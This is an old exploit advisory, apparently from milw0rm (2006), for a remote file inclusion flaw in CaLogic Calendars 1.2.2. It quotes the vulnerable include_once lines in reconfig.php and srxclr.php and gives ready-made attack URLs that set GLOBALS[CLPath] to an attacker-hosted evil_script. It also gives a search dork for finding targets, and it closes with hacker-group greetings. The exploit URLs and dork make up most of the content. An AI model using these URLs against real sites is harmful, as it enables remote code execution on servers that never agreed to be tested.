1 ################ DEVIL TEAM THE BEST POLISH TEAM #################
2 #CaLogic Calendars V1.2.2 − Remote File Include
3 #Find by Kacper (Rahim).
4 #Greetings For ALL DEVIL TEAM members, Special DragonHeart :***
5 #Contact: kacper1964@yahoo.pl or http://www.devilteam.yum.pl
6 #dork: CaLogic Calendars V1.2.2
7 ##################################################################
8 reconfig.php:
9 [code]
10 include_once("./include/config.php");
11 include_once($GLOBALS["CLPath"]."/classes/session.php");
12 include_once($GLOBALS["CLPath"]."/include/gfunc.php");
13 include_once($GLOBALS["CLPath"]."/classes/calogicautomation.php");
14 [/code]
15
16 http://site.com/[path]/reconfig.php?GLOBALS[CLPath]=[evil_script]
17
18
19 srxclr.php:
20 [code]
21 include_once("./include/config.php");
22 include_once($GLOBALS["CLPath"]."/include/calfunc.php");
23 include_once($GLOBALS["CLPath"]."/include/gfunc.php");
24 include_once($GLOBALS["CLPath"]."/include/efuncs.php");
25 [/code]
26
27 http://site.com/[path]/srxclr.php?GLOBALS[CLPath]=[evil_script]
28
29 #pozdro :)
30
31 # milw0rm.com [2006−05−20]
Page 1/1
CaLogic Calendars 1.2.2 CLPath Remote File Include Vulnerabilities
Kacper
05/20/2006